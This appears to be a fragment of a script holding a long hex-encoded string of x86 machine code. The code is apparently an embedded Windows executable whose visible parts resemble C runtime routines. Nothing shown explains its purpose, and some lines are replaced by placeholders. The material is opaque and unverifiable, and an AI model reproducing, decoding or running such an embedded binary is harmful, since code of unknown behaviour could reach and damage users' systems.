'b028907c785b8fdffff01000000e97a04000083cb40899de8fdffffc785dc' \
'fdffff0a000000f7c300800000750cf7c3001000000f848e0100008b0f83c' \
'70889bde4fdffff8b7ffc33f6e9ae010000751180f9677556c785d8fdffff' \
'01000000eb4a3bc27e088bc28985d8fdffff3da30000007e378db85d01000' \
'057e89b0c0000598a8deffdffff8985a8fdffff85c0740a8bf089bdc0fdff' \
'ffeb0ac785d8fdffffa30000008bbde4fdffff8b0783c708898580fdffff8' \
'b47fc898584fdffff8d8588fdffff50ffb5a0fdffff0fbec1ffb5d8fdffff' \
'89bde4fdffff50ffb5c0fdffff8d8580fdffff5650ff35786e4200ff15f8a' \
'14100ffd08bfb83c41c81e780000000742183bdd8fdffff0075188d8588fd' \
'ffff5056ff35846e4200ff15f8a14100ffd0595980bdeffdffff67751c85f' \
'f75188d8588fdffff5056ff35806e4200ff15f8a14100ffd05959803e2d0f' \
'8528feffff81cb00010000899de8fdffff46e916feffffc785d8fdffff080' \
'000006a07eb1c83e8730f84dffcffff48480f8496feffff83e8030f856b01' \
'00006a27588985b0fdffffc785dcfdffff1000000084db0f897cfeffff045' \
'1c685d4fdffff308885d5fdffffc785ccfdffff02000000e95efeffff83c7' \
'0433f689bde4fdfffff6c3207411f6c34074060fbf47fceb0e0fb747fceb0' \
'8f6c340740a8b47fc998bc88bfaeb058b4ffc8bfef6c340741c3bfe7f187c' \
'043bce7312f7d913fef7df81cb00010000899de8fdfffff7c300900000750' \
'28bfe8b95d8fdffff85d2790533d242eb1483e3f7b800020000899de8fdff' \
'<KEY>' \
'<KEY>' \
'9d9cfdffff8985c0fdffff8bfa83f9397e06038db0fdffff8b95d8fdffff8' \
'80e8b8dc0fdffff4eebb08b9de8fdffff8d45f32bc6468985dcfdfffff7c3' \
'00020000743685c07405803e30742d4eff85dcfdffffc60630eb2185f6750' \
'<KEY>' \
'bdb8fdffff000f8586010000f6c3407435f7c3000100007409c685d4fdfff' \
'f2deb1af6c3017409c685d4fdffff2beb0cf6c3027411c685d4fdffff20c7' \
'85ccfdffff010000008bbdc8fdffff2bbddcfdffff8b85ccfdffff2bf8f6c' \
'30c751e8d85e0fdffff50ffb5d0fdffff576a20e8000200008b85ccfdffff' \
'83c410ffb5acfdffff8d8de0fdffff51ffb5d0fdffff508d85d4fdffff50e' \
'80302000083c414f6c308741df6c30475188d85e0fdffff50ffb5d0fdffff' \
'576a30e8b501000083c41083bdc4fdffff008b85dcfdffff747d85c07e798' \
'bce488985c0fdffff0fb701506a068d45f4508d85a4fdffff83c10250898d' \
'9cfdffffe8655c000083c41085c0753f3985a4fdffff7437ffb5acfdffff8' \
'd85e0fdffff50ffb5d0fdffff8d45f4ffb5a4fdffff50e8720100008b85c0' \
'fdffff8b8d9cfdffff83c41485c07596eb2883caff8995e0fdffffeb23ffb' \
'5acfdffff8d8de0fdffff51ffb5d0fdffff5056e83801000083c4148b95e0' \
'fdffff85d27823f6c304741e8d85e0fdffff50ffb5d0fdffff576a20e8e50' \
'0000083c4108b95e0fdffff8b85a8fdffff85c0741550e8dcceffff33c059' \
'8985a8fdffff8b95e0fdffff8b85f0fdffff8a08888deffdffff888db4fdf' \
'fff84c90f8508f6ffff8bc280bd94fdffff005f5e5b740a8b8d90fdffff83' \
'6170fd8b4dfc33cde822a5ffffc9c3e843eeffffc70016000000e8c9edfff' \
'f83c8ffebc98bff8113410079114100ad114100001241005c124100691241' \
'00b5124100f7134100558bec8b550cf6420c407406837a0800742dff4a047' \
'80e8b028a4d088808ff020fb6c1eb0d0fbe45085250e898240000595983f8' \
'ff75088b45108308ff5dc38b4510ff005dc3558bec568b750c85f67e1e578' \
'b7d1457ff75104eff7508e89effffff83c40c833fff740485f67fe75f5e5d' \
'c3558bec568b7518578b7d108b06f6470c408945187410837f0800750a8b4' \
'd148b450c0101eb4e832600538b5d0c85db7e408b4514508b4508570fb600' \
'504be84bffffff8b451483c40cff45088338ff7514833e2a751350576a3fe' \
'<KEY>' \
'cccccccccc68c01c410064ff35000000008b442410896c24108d6c24102be' \
'0535657a1606342003145fc33c5508965e8ff75f88b45fcc745fcfeffffff' \
'8945f88d45f064a300000000c38b4df064890d00000000595f5f5e5b8be55' \
'd51c3cccccccccccccc558bec83ec18538b5d0c56578b7b08333d60634200' \
'c645ff00c745f4010000008b078d731083f8fe740d8b4f0403ce330c30e86' \
'2a3ffff8b4f0c8b470803ce330c30e852a3ffff8b4508f64004660f85d000' \
'00008945e88b45108945ec8d45e88943fc8b430c8945f883f8fe0f84ee000' \
'0008d04408d40048b4c87048b1c878d04878945f085c9747b8bd6e8a24c00' \
'<KEY>' \
'7410000741f68c4c74100e8535a000083c40485c0740e6a01ff7508ff15c4' \
'c7410083c4088b55088b4d0ce8854c00008b450c8b55f839500c741068606' \
'34200568bc8e8864c00008b450c89580c8b0783f8fe7475eb668a4dff8bc3' \
'895df883fbfe0f855dffffff84c97447eb21c745f400000000eb18837b0cf' \
'e74366860634200568bcbbafeffffffe83f4c00008b0783f8fe740d8b4f04' \
'03ce330c30e849a2ffff8b4f0c8b570803ce330c32e839a2ffff8b45f45f5' \
'e5b8be55dc38b4f0403ce330c30e822a2ffff8b4f0c8b470803ce330c30e8' \
'12a2ffff8b4df08bd68b4908e8b54b0000cc6a6468402e4200e8fffdffff6' \
'a0be8380300005933db895dfc6a406a205f57e8a004000059598bc8894ddc' \
'85c9751b6afe8d45f0506860634200e86c4a000083c40c83c8ffe95502000' \
'0a3e0744200893dd080420005000800003bc8733166c74104000a8309ff89' \
'5908806124808a4124247f88412466c741250a0a89593888593483c140894' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'0c50ff15aca14100ff46088b55e08b4de447897dd48b45d8408945d883c20' \
'48955e0eb86890cb5e0744200013dd08042008b04b5e07442000500080000' \
'3bc8732466c74104000a8309ff8959088061248066c741250a0a895938885' \
'93483c140894ddcebcc468975d08b4de4e906ffffff895dd483fb030f8db8' \
'0000008bf3c1e6060335e07442008975dc833eff7413833efe740e0fbe460' \
'40c80884604e98c000000c646048185db75056af658eb0a8d43fff7d81bc0' \
'83c0f550ff15cca041008bf883ffff744585ff744157ff1580a0410085c07' \
'436893e25ff00000083f80275080fbe46040c40eb0b83f80375090fbe4604' \
'0c0888460468a00f00008d460c50ff15aca14100ff4608eb220fbe46040c4' \
'0884604c706feffffffa15c81420085c0740a8b0498c74010feffffff43e9' \
'3cffffffc745fcfeffffffe80800000033c0e8acfbffffc36a0be80302000' \
'059c36a1068602e4200e851fbffff33ff897de46a01e88500000059217dfc' \
'6a035e8975e03b35608142007d53a15c8142008b04b085c07444f6400c837' \
'41050e8e85700005983f8ff740447897de483fe147c29a15c8142008b04b0' \
'83c02050ff159ca14100a15c814200ff34b0e853c8ffff59a15c814200832' \
'4b00046eba2c745fcfeffffffe80b0000008bc7e812fbffffc38b7de46a01' \
'e86601000059c3558bec568b7508833cf5906c420000751356e8710000005' \
'985c075086a11e87d02000059ff34f5906c4200ff15e8a041005e5dc35657' \
'be906c42008bfe538b1f85db7417837f0401741153ff159ca1410053e8cfc' \
'7ffff8327005983c70881ffb06d42007cd85b833e00740e837e04017508ff' \
'36ff159ca1410083c60881feb06d42007ce25f5ec36a0868802e4200e82cf' \
'affff833d9c7d4200007518e8102c00006a1ee8692c000068ff000000e8d7' \
'01000059598b7d08833cfd906c420000755b6a18e8fa000000598bf085f67' \
'50fe80ce7ffffc7000c00000033c0eb416a0ae81affffff598365fc00833c' \
'fd906c420000751568a00f000056ff15aca141008934fd906c4200eb0756e' \
'816c7ffff59c745fcfeffffffe80900000033c040e8e0f9ffffc36a0ae837' \
'00000059c35657be906c4200bfe0754200837e04017512893e68a00f0000f' \
'f3683c718ff15aca1410083c60881feb06d42007cdd33c05f405ec3558bec' \
'8b4508ff34c5906c4200ff15eca041005dc3558bec565733f66a00ff750cf' \
'f7508e8775600008bf883c40c85ff7527390530774200761f56ff1500a141' \
'<KEY>' \
'3558bec5356578b3d3077420033f6ff7508e8b8e6ffff8bd85985db752585' \
'<KEY>' \
'<KEY>' \
'8bf8595985ff752c39450c7427390530774200761f56ff1500a141008d86e' \
'<KEY>' \
'518d45fc506894bc41006a00ff1588a0410085c0741768acbc4100ff75fcf' \
'f15a4a0410085c07405ff7508ffd0c9c3558becff7508e8c3ffffff59ff75' \
'08ff1584a04100cc558bece80a2a0000ff7508e8622a00005968ff000000e' \
'8b0000000cc6a016a016a00e84001000083c40cc36a016a006a00e8310100' \
'0083c40cc3558bec833dc480420000741968c4804200e8405300005985c07' \
'40aff7508ff15c480420059e8b152000068e4a2410068cca24100e8c00000' \
'00595985c075505657685a584100e8c1b3ffff59bea0a24100bfc8a24100e' \
'b0b8b0685c07402ffd083c6043bf772f1833db8804200005f5e741b68b880' \
'4200e8da5200005985c0740c6a006a026a00ff15b880420033c05dc3558be' \
'c6a006a01ff7508e88d00000083c40c5dc3566a00ff15f4a141008bf056e8' \
'74e6ffff56e8a4e3ffff56e8932b000056e828bdffff56e8e354000056e81' \
'd36000083c4185ee91ee7ffff558bec568b7508eb0b8b0685c07402ffd083' \
'c6043b750c72f05e5dc3558bec568b750833c0eb0f85c075108b0e85c9740' \
'2ffd183c6043b750c72ec5e5dc36a08e804fcffff59c36a08e85ffdffff59' \
'c36a1c68a02e4200e8adf6ffff6a08e8e6fbffff598365fc00833d4877420' \
'0010f84c9000000c7053c774200010000008a4510a238774200837d0c000f' \
'859c000000ff35c08042008b35f8a14100ffd68bd8895dd485db7474ff35b' \
'c804200ffd68bf8895de4897de0897ddc83ef04897ddc3bfb72576a00ff15' \
'f4a14100390774ea3bfb7247ff37ffd68bf06a00ff15f4a141008907ffd6f' \
'f35c08042008b35f8a14100ffd68945d8ff35bc804200ffd68b4dd8394de4' \
'75053945e074ae894de48bd9895dd48945e08bf8eb9c68fca2410068e8a24' \
'100e8d5feffff59596804a341006800a34100e8c4feffff5959c745fcfeff' \
'ffffe820000000837d10007529c70548774200010000006a08e84cfcffff5' \
'9ff7508e869fdffff837d100074086a08e836fcffff59c3e8d0f5ffffc355' \
'8bec6a006a00ff7508e8c2feffff83c40c5dc36a1468c02e4200e86af5fff' \
'f8b7d0883fffe7510e87ee2ffffc70009000000e9b900000085ff0f88a100' \
'00003b3dd08042000f83950000008bc7c1f8058945e08bdf83e31fc1e3068' \
'b0485e07442000fbe44030483e001747457e8ef5400005933f68975fc8b45' \
'e08b0485e0744200f644030401742857e8e45500005950ff1508a1410085c' \
'07508ff15c0a041008bf08975e485f67418e8c7e1ffff8930e8f4e1ffffc7' \
'000900000083ceff8975e4c745fcfeffffffe80a0000008bc6eb218b7d088' \
'b75e457e8fc55000059c3e8c5e1ffffc70009000000e84be1ffff83c8ffe8' \
'd6f4ffffc36a1068e02e4200e884f4ffff8b750883fefe7518e864e1ffff8' \
'32000e890e1ffffc70009000000e9ad00000085f60f888d0000003b35d080' \
'42000f83810000008bdec1fb058bfe83e71fc1e7068b049de07442000fbe4' \
'4380483e001746356e804540000598365fc008b049de0744200f644380401' \
'7413ff7510ff750c56e85f00000083c40c8bf8eb16e822e1ffffc70009000' \
'000e8e3e0ffff83200083cfff897de4c745fcfeffffffe80a0000008bc7eb' \
'298b75088b7de456e82255000059c3e8b7e0ffff832000e8e3e0ffffc7000' \
'9000000e869e0ffff83c8ffe8f4f3ffffc3558becb8f01a0000e8014b0000' \
'a16063420033c58945fc8b45088b4d0c33d2578bfa898540e5ffff898d44e' \
'5ffff89bd3ce5ffff89952ce5ffff395510750733c0e9d707000085c9751f' \
'e84ce0ffff2138e879e0ffffc70016000000e8ffdfffff83c8ffe9b407000' \
'053568bc8c1f9058bf083e61fc1e606898d30e5ffff8b0c8de074420089b5' \
'14e5ffff8a5c0e2402dbd0fb80fb02740580fb01752b8b4510f7d0a801751' \
'ce8f0dfffff2138e81de0ffffc70016000000e8a3dfffffe94c0700008b85' \
'40e5fffff6440e0420740d6a02525250e84855000083c410ffb540e5ffffe' \
'8954b00005985c00f84180300008b8530e5ffff8b0485e0744200f6440604' \
'800f8400030000e8f2daffff8b406c33c93988a80000008d851ce5ffff508' \
'b8530e5ffff0f94c18b0485e0744200ff3406898d40e5ffffff15f4a04100' \
'85c00f84c202000039bd40e5ffff740884db0f84b2020000ff158ca041008' \
'b9544e5ffff21bd24e5ffff8bca898510e5ffff898d34e5ffff397d100f86' \
'7e02000033c0898538e5ffffc78518e5ffff0a00000084db0f858f0100008' \
'a0933c080f90a0f94c0898540e5ffff8b8530e5ffff8b1485e0744200837c' \
'16380074178a4416348845f46a028d45f4884df5836416380050eb5a0fbec' \
'150e82497ffff5985c074448b8544e5ffff8b9534e5ffff2bc203451083f8' \
'010f86d30100006a02528d853ce5ffff50e87a55000083c40c83f8ff0f84d' \
'b0100008b8534e5ffff40ff8538e5ffffeb266a01ffb534e5ffff8d853ce5' \
'ffff50e84b55000083c40c83f8ff0f84ac0100008b8534e5ffff33c951514' \
'0ff8538e5ffff6a05898534e5ffff8d45f4506a018d853ce5ffff5051ffb5' \
'10e5ffffff15bca1410089851ce5ffff85c00f846b0100006a008d8d24e5f' \
'fff51508d45f4508b8530e5ffff8b0485e0744200ff3406ff1504a1410085' \
'c00f84eb0400008bbd38e5ffff8b851ce5ffff03bd2ce5ffff398524e5fff' \
'f0f8c2101000083bd40e5ffff000f84da0000006a008d8524e5ffff506a01' \
'8d45f4508b8530e5ffffc645f40d8b0485e0744200ff3406ff1504a141008' \
'5c00f848f04000083bd24e5ffff010f8cd6000000ff852ce5ffff47e99000' \
'000080fb01740580fb0275330fb70133d2663b8518e5ffff89853ce5ffff8' \
'b8538e5ffff0f94c283c10283c002898d34e5ffff898538e5ffff899540e5' \
'ffff80fb01740580fb027555ffb53ce5ffffe82354000059663b853ce5fff' \
'f0f851604000083c70283bd40e5ffff0074246a0d585089853ce5ffffe8fa' \
'53000059663b853ce5ffff0f85ed03000047ff852ce5ffff8b8538e5ffff8' \
'b8d34e5ffff3b45100f82c4fdffffeb238b9d30e5ffff8a028b0c9de07442' \
'004788440e348b049de0744200c7440638010000008bb540e5ffffe9a9030' \
'0008bb540e5ffffe9a80300008b8530e5ffff8b0485e0744200f644060480' \
'0f84550300008b9544e5ffff33f689b538e5ffff84db0f85e10000008bc28' \
'9853ce5ffff3975100f869103000033c92bc28b953ce5ffff8d9d48e5ffff' \
'898d40e5ffff3b451073448a0a4240888d23e5ffff80f90a8b8d40e5ffff8' \
'9953ce5ffff750bff852ce5ffffc6030d43418a9523e5ffff88138b953ce5' \
'ffff4341898d40e5ffff81f9ff13000072b78b8d14e5ffff8d8548e5ffff2' \
'bd86a008d8528e5ffff50538d8548e5ffff508b8530e5ffff8b0485e07442' \
'00ff3401ff1504a1410085c00f84bb02000003bd28e5ffff8b9544e5ffff3' \
'99d28e5ffff0f8cb10200008b853ce5ffff2bc23b45108b853ce5ffff0f82' \
'35ffffffe9950200008bca80fb020f85fe000000898d40e5ffff3975100f8' \
'6a7020000c78518e5ffff0a00000083a51ce5ffff008bbd2ce5ffff8bc12b' \
'c28b951ce5ffff8d9d48e5ffff3b4510733e0fb73183c10283c002898d40e' \
'5ffff663bb518e5ffff75156a0d5966890b8b8d40e5ffff83c70283c30283' \
'c20266893383c20283c30281fafe13000072bd8b8d14e5ffff8d8548e5fff' \
'f2bd86a008d8528e5ffff50538d8548e5ffff508b8530e5ffff89bd2ce5ff' \
'ff8b0485e0744200ff3401ff1504a141008bb538e5ffff8bbd3ce5ffff85c' \
'00f84b401000003bd28e5ffff8b9544e5ffff89bd3ce5ffff399d28e5ffff' \
'0f8ca40100008b8d40e5ffff8bc12bc23b45100f8220ffffffe98c0100008' \
'b5d10898d24e5ffff85db0f84a7010000c78518e5ffff0a00000083a51ce5' \
'ffff008bb524e5ffff2bca8b951ce5ffff8d8548f9ffff3bcb733b0fb73e8' \
'3c60283c10289b524e5ffff663bbd18e5ffff75126a0d5e6689308bb524e5' \
'ffff83c00283c20266893883c20283c00281faa806000072c133f65656685' \
'50d00008d8df0ebffff518d8d48f9ffff2bc1992bc2d1f8508bc1505668e9' \
'fd0000ff15bca141008bb538e5ffff8bbd3ce5ffff898534e5ffff85c00f8' \
'4c200000033c9898d40e5ffff6a002bc18d9528e5ffff52508d85f0ebffff' \
'03c18b8d14e5ffff508b8530e5ffff8b0485e0744200ff3401ff1504a1410' \
'085c0741e8b8d40e5ffff038d28e5ffff8b8534e5ffff898d40e5ffff3bc1' \
'7fafeb1aff15c0a041008b8d40e5ffff8bf08b8534e5ffff89b538e5ffff3' \
'bc17f518b8d24e5ffff8b9544e5ffff8bf92bfa89bd3ce5ffff3bfb0f82c8' \
'feffffeb376a008d8d28e5ffff51ff7510ffb544e5ffffff3406ff1504a14' \
'10085c0740a8bbd28e5ffff33f6eb08ff15c0a041008bf08b9544e5ffff85' \
'ff756385f674246a055b3bf37514e80fd9ffffc70009000000e8d0d8ffff8' \
'918eb3f56e8d9d8ffff59eb368b8530e5ffff8b8d14e5ffff8b0485e07442' \
'00f6440104407409803a1a750433c0eb20e8cfd8ffffc7001c000000e890d' \
'8ffff83200083c8ffeb082bbd2ce5ffff8bc75e5b8b4dfc33cd5fe87f8fff' \
'ffc9c3a1b06d420083f8ff740c83f8fe740750ff15c4a04100c333c050506' \
'a03506a0368000000c068bcbc4100ff1514a14100a3b06d4200c3558bec56' \
'e8aed3ffff8bf085f60f84450100008b565c578b7d088bca3939740d83c10' \
'c8d82900000003bc872ef8d82900000003bc873043939740233c985c90f84' \
'100100008b510885d20f840501000083fa05750c8361080033c040e9f6000' \
'00083fa01750883c8ffe9e90000008b450c538b5e60894660837904080f85' \
'c00000006a245f8b465c83c70c836407fc0081ff900000007ced81398e000' \
'0c08b7e64750cc7466483000000e9860000008139900000c07509c7466481' \
'000000eb758139910000c07509c7466484000000eb648139930000c07509c' \
'7466485000000eb5381398d0000c07509c7466482000000eb4281398f0000' \
'c07509c7466486000000eb318139920000c07509c746648a000000eb20813' \
'9b50200c07509c746648d000000eb0f8139b40200c07507c746648e000000' \
'ff76646a08ffd259897e64eb09ff710483610800ffd259895e6083c8ff5be' \
'b0233c05f5e5dc3558bec837d08007515e806d7ffffc70016000000e88cd6' \
'ffff83c8ff5dc3ff75086a00ff359c7d4200ff15dca141005dc3cccc53568' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'4e33d28bc65e5bc21000558becb8ffff000083ec14663945080f849b00000' \
'056ff750c8d4dece8cc8dffff8b75ec8b86a800000085c075188b4d088d41' \
'bf6683f81977046683c1200fb7c10fb7c0eb1fba000100006a01663955087' \
'32aff7508e889cfffff595985c075090fb745080fb7c0eb0e0fb74d088b86' \
'940000000fb604080fb7c0eb1c8d4dfc516a018d4d08515250e82dd7ffff8' \
'3c41885c075090fb745080fb7c0eb040fb745fc807df8005e74078b4df483' \
'<KEY>' \
'50c578b7d14ff75108985d8fbffff33c08bd88d8db0fbffff89b5f8fbffff' \
'89bdf4fbffff8985acfbffff899df0fbffff8985dcfbffff8985e8fbffff8' \
'985d4fbffff8985c0fbffff8985d0fbffffe8ce8cffffe855d5ffff89859c' \
'fbffff399dd8fbffff752ae842d5ffffc70016000000e8c8d4ffff389dbcf' \
'bffff740a8b85b8fbffff836070fd83c8ffe9150b000085f674d233c98bc1' \
'8bd1898dccfbffff898da8fbffff0fb70e8985e0fbffff8995ecfbffff898' \
'de4fbffff6685c90f84ce0a00008bb594fbffffc7858cfbffff58000000c7' \
'8584fbffff64000000c78580fbffff69000000c78598fbffff6f000000838' \
'5f8fbffff0285c00f88910a00006a588d41e05f663bc7770f0fb7c10fbe80' \
'18bc410083e00feb0233c08bbdccfbffff0fbebcc738bc41008bc7c1f8048' \
'9bdccfbffff8bbdf4fbffff8985ccfbffff83f8070f87290a0000ff2485b6' \
'3f410033c0838de8fbffffff8bd88985a0fbffff8985c0fbffff8985dcfbf' \
'fff8985d4fbffff899df0fbffff8985d0fbffffe9ee0900000fb7c16a2059' \
'2bc1744683e803743983e808742f4848741d83e8038b85f8fbffff0f85cd0' \
'9000083cb08899df0fbffffe9bf09000083cb04899df0fbffffe9ab090000' \
'83cb01ebf081cb80000000ebe883cb02ebe36a2a58663bc8752f8b0783c70' \
'489bdf4fbffff8985dcfbffff85c00f897809000083cb04f7d8899df0fbff' \
'ff8985dcfbffffe9620900008b85dcfbffff6bc00a8985dcfbffff0fb7c18' \
'b8ddcfbffff83c1d003c8898ddcfbffffe93a09000033c08985e8fbffffe9' \
'2d0900006a2a58663bc8752b8b0783c7048985e8fbffff85c08b85f8fbfff' \
'f89bdf4fbffff0f890c090000838de8fbffffffe9000900008b85e8fbffff' \
'6bc00a8985e8fbffff0fb7c18b8de8fbffff83c1d003c8898de8fbffffe9d' \
'20800000fb7c183f849745783f86874486a6c593bc1741a83f8778b85f8fb' \
'ffff0f85b508000081cb00080000e9e0feffff8b85f8fbffff66390875148' \
'3c0028985f8fbffff81cb00100000e9c1feffff83cb10e9b9feffff6a2058' \
'0bd8e9bdfeffff8b85f8fbffff0fb70083f83675238bbdf8fbffff66837f0' \
'23475168bc783c0048985f8fbffff81cb00800000e97efeffff83f8337523' \
'8bbdf8fbffff66837f023275168bc783c0048985f8fbffff81e3ff7fffffe' \
'956feffff663b8584fbffff0f840d080000663b8580fbffff0f8400080000' \
'663b8598fbffff0f84f307000083f8750f84ea07000083f8780f84e107000' \
'0663b858cfbffff0f84d407000033c08985ccfbffff8d85e0fbffff50ffb5' \
'd8fbffffc785d0fbffff0100000051e83d08000083c40ce9a10700000fb7c' \
'183f8640f8f2b0200000f84b302000083f8530f8f27010000747d83e84174' \
'10484874584848740848480f859c0500006a205803c8c785a0fbffff01000' \
'000898de4fbffff8b85e8fbffff83cb40ba00020000899df0fbffff8db5fc' \
'fbffff8995ecfbffff85c00f8990020000c785e8fbffff06000000e9e1020' \
'000f7c3300800000f85da0000006a20580bd8899df0fbffffe9ca000000f7' \
'c330080000750b6a20580bd8899df0fbffff8b85e8fbffffbfffffff7f83f' \
'8ff74028bf88bb5f4fbffff83c60489b5f4fbffff8b76fcf6c3200f84c104' \
'000085f675068b35486c420033c98bc68bd18985e4fbffff8995ecfbffff8' \
'5ff0f8ed00400008a0084c00f84c60400008d8db0fbffff0fb6c05150e8c4' \
'88ffff5985c08b85e4fbffff597401408b95ecfbffff40428985e4fbffff8' \
'995ecfbffff3bd77cc1e98c04000083e8580f84dc02000048480f848b0000' \
'0083e8070f84ebfeffff48480f856a0400000fb70783c704c785d0fbffff0' \
'100000089bdf4fbffff8985a4fbfffff6c32074448885c4fbffff33c08885' \
'c5fbffff8d85b0fbffff508b85b0fbffffff70748d85c4fbffff508d85fcf' \
'bffff50e8ed45000083c41085c07913c785c0fbffff01000000eb07668985' \
'fcfbffff33d28db5fcfbffff42e9ea0300008b0783c70489bdf4fbffff85c' \
'074368b700485f6742ff7c30008000074170fbf00992bc28bd0c785d0fbff' \
'ff01000000e9b30300000fbf1033c9898dd0fbffffe9a50300008b35486c4' \
'20056e810b7ffff598bd0e99103000083f8700f8feb0100000f84d7010000' \
'83f8650f8c7f03000083f8670f8eeffdffff6a69593bc1746683f86e74276' \
'a6f593bc10f855f030000c785e4fbffff0800000084db795b81cb00020000' \
'899df0fbffffeb4d83c70489bdf4fbffff8b7ffce8b29effff85c00f84430' \
'500008b85e0fbfffff6c3207405668907eb028907c785c0fbffff01000000' \
'e9c304000083cb40899df0fbffffc785e4fbffff0a000000f7c3008000007' \
'50cf7c3001000000f84970100008b0f83c70889bdf4fbffff8b7ffce9b001' \
'000075146a6758663bc87556c785e8fbffff01000000eb4a3bc27e088bc28' \
'985e8fbffff3da30000007e378db85d01000057e88ee8ffff598b8de4fbff' \
'ff8985a8fbffff85c0740a8bf089bdecfbffffeb0ac785e8fbffffa300000' \
'08bbdf4fbffff8b0783c708898578fbffff8b47fc89857cfbffff8d85b0fb' \
'ffff50ffb5a0fbffff0fbec1ffb5e8fbffff89bdf4fbffff50ffb5ecfbfff' \
'f8d8578fbffff5650ff35786e4200ff15f8a14100ffd08bfb83c41c81e780' \
'000000742183bde8fbffff0075188d85b0fbffff5056ff35846e4200ff15f' \
'8a14100ffd059596a6758663985e4fbffff751c85ff75188d85b0fbffff50' \
'56ff35806e4200ff15f8a14100ffd05959803e2d0f851efeffff81cb00010' \
'000899df0fbffff46e90cfeffffc785e8fbffff080000006a07eb1c83e873' \
'0f8479fcffff48480f8492feffff83e8030f85890100006a27588985acfbf' \
'fffc785e4fbffff1000000084db0f8978feffff6a305983c05166898dc8fb' \
'ffff668985cafbffffc785d4fbffff02000000e955feffff83c70489bdf4f' \
'bfffff6c3207411f6c34074060fbf47fceb0e0fb747fceb08f6c340740c8b' \
'47fc998bc88bfa33c0eb078b4ffc33c08bf8f6c340741c3bf87f187c043bc' \
'87312f7d913f8f7df81cb00010000899df0fbfffff7c30090000075028bf8' \
'8b95e8fbffff85d2790533d242eb1683e3f7899df0fbffff81fa000200007' \
'e05ba000200008bc10bc775068985d4fbffff8db5fbfdffff8bc24a8995e8' \
'fbffff85c07f068bc10bc7743d8b85e4fbffff9952505751e8e039000083c' \
'130899d94fbffff8985ecfbffff8bfa83f9397e06038dacfbffff8b95e8fb' \
'ffff880e8b8decfbffff4eebb08b9df0fbffff8d95fbfdffff2bd6468995e' \
'cfbfffff7c300020000744585d27405803e30743c4e6a3058880642eb2d85' \
'f675068b354c6c4200c785d0fbffff010000008bd685ff740f33c04f66390' \
'2740783c20285ff75f32bd6d1fa8995ecfbffff83bdc0fbffff000f85ad01' \
'0000f6c3407420f7c3000100000f841d0100006a2d58668985c8fbffffc78' \
'5d4fbffff010000006a20598bbddcfbffff8b85d4fbffff2bfa2bf8f6c30c' \
'751d8d85e0fbffff50ffb5d8fbffff5751e83f0200008b85d4fbffff83c41' \
'0ffb59cfbffff8d8de0fbffff51ffb5d8fbffff508d85c8fbffff50e8e30f' \
'000083c414f6c308741ff6c304751a8d85e0fbffff50ffb5d8fbffff576a3' \
'05850e8f201000083c41083bdd0fbffff008b85ecfbffff0f85b300000085' \
'c00f8eab0000008bce89b5e4fbffff48898594fbffff8d85b0fbffff508b8' \
'5b0fbffffff70748d85a4fbffff5150e8e040000083c410898588fbffff85' \
'c07e678d85e0fbffff50ffb5d8fbffffffb5a4fbffffe84d0100008b8de4f' \
'bffff038d88fbffff8b8594fbffff83c40c898de4fbffff85c07f98eb56f6' \
'c30174076a2be9d9fefffff6c3020f84e2feffff6a205966898dc8fbffffc' \
'785d4fbffff01000000e9ccfeffff83c8ff8985e0fbffffeb23ffb59cfbff' \
'ff8d8de0fbffff51ffb5d8fbffff5056e8dc0e000083c4148b85e0fbffff8' \
'5c0781ff6c304741a8d85e0fbffff50ffb5d8fbffff576a205850e8e60000' \
'0083c4108b85a8fbffff85c0740f50e88daaffff33c0598985a8fbffff8b9' \
'5ecfbffff8b85f8fbffff0fb7088b85e0fbffff898de4fbffff6685c90f85' \
'60f5ffff80bdbcfbffff00740a8b8db8fbffff836170fd8b4dfc5f5e33cd5' \
'be8d380ffffc9c3e8f4c9ffffc70016000000e87ac9ffff80bdbcfbffff00' \
'0f84b7f4ffff8b8db8fbffff836170fde9a8f4ffff8bff7c3741002635410' \
'05a354100af3541000e3641001b36410076364100a1374100558bec8b450c' \
'f6400c40740683780800741d50ff7508e89f4000005959b9ffff0000663bc' \
'175088b45108308ff5dc38b4510ff005dc3558bec568b750c85f67e1e578b' \
'7d1457ff75104eff7508e8aeffffff83c40c833fff740485f67fe75f5e5dc' \
'3558bec568b750c5756e8a7ceffff598b4e0c8bf8f6c1827517e82bc9ffff' \
'c70009000000834e0c2083c8ffe919010000f6c140740de80fc9ffffc7002' \
'2000000ebe25333dbf6c1017413895e04f6c110747d8b460883e1fe890689' \
'4e0c8b460c83e0ef83c80289460c895e04a90c010000752ae84689ffff83c' \
'0203bf0740ce83a89ffff83c0403bf0750b57e8653400005985c0750756e8' \
'4141000059f7460c08010000747a8b56088b0e8d420189068b46182bca488' \
'94d0c89460485c97e17515257e8d0e6ffff83c40c8bd8eb4783c920894e0c' \
'eb6883ffff741b83fffe74168bcf8bc783e11fc1f805c1e106030c85e0744' \
'200eb05b9506c4200f641042074146a02535357e8933c000023c283c41083' \
'f8ff74258b4e088a45088801eb1633c0405089450c8d45085057e867e6fff' \
'f83c40c8bd83b5d0c7409834e0c2083c8ffeb040fb645085b5f5e5dc3558b' \
'ec81ec88040000a16063420033c58945fc8b450853568b750c578b7d14ff7' \
'5108985d8fbffff33c08bd88d8db4fbffff89b5f8fbffff89bdf4fbffff89' \
'85acfbffff899df0fbffff8985dcfbffff8985e8fbffff8985d4fbffff898' \
'5b0fbffff8985d0fbffffe8037fffffe88ac7ffff8985a4fbffff399dd8fb' \
'ffff752ae877c7ffffc70016000000e8fdc6ffff389dc0fbffff740a8b85b' \
'cfbffff836070fd83c8ffe9300b000085f674d233c98bc18bd1898dccfbff' \
'ff898da8fbffff0fb70e8985e0fbffff8995ecfbffff898de4fbffff6685c' \
'90f84e90a00008bb594fbffffc7858cfbffff58000000c78584fbffff6400' \
'0000c78580fbffff69000000c78598fbffff6f0000008385f8fbffff0285c' \
'00f889d0a00006a588d41e05f663bc7770f0fb7c10fb68088f7410083e00f' \
'eb0233c08bbdccfbffff6bc0090fb6bc38a8f741008bc7c1e80489bdccfbf' \
'fff8bbdf4fbffff8985ccfbffff83f8080f84ad0a000083f8070f87290a00' \
'00ff2485b94d410033c0838de8fbffffff8bd88985a0fbffff8985b0fbfff' \
'f8985dcfbffff8985d4fbffff899df0fbffff8985d0fbffffe9ee0900000f' \
'b7c16a20592bc1744683e803743983e808742f4848741d83e8038b85f8fbf' \
